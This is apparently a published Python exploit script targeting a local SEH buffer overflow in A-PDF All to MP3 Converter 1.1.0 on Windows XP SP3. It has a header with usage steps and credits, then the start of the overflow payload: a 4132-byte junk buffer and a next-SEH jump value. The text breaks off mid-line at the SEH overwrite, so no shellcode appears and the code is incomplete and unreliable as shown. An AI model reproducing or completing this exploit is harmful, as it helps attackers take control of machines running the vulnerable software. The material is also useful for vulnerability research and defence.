#!/usr/bin/python ################################################################################ # Exploit Title: A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit # Date: September 18, 2010 # Author: modpr0be # Software Link: http://www.a-pdf.com/all-to-mp3/download.htm # Version: 1.1.0 # Tested on: Windows XP SP3 # # Open application --> Next --> Add --> blah.wav --> calc will pop out # # Other applications made by a-pdf may be affected. # this exploit is simply reference from EDB 14681 and 14676 # Exploit using direct EIP is also working. # # thx: amalia, offsec, xecureit, jasakom, oebaj, 0x70y, postnix. ################################################################################ import struct junk1 = 'A' * 4132 nseh = "\xeb\x06\x90\x90" seh = struct.pack('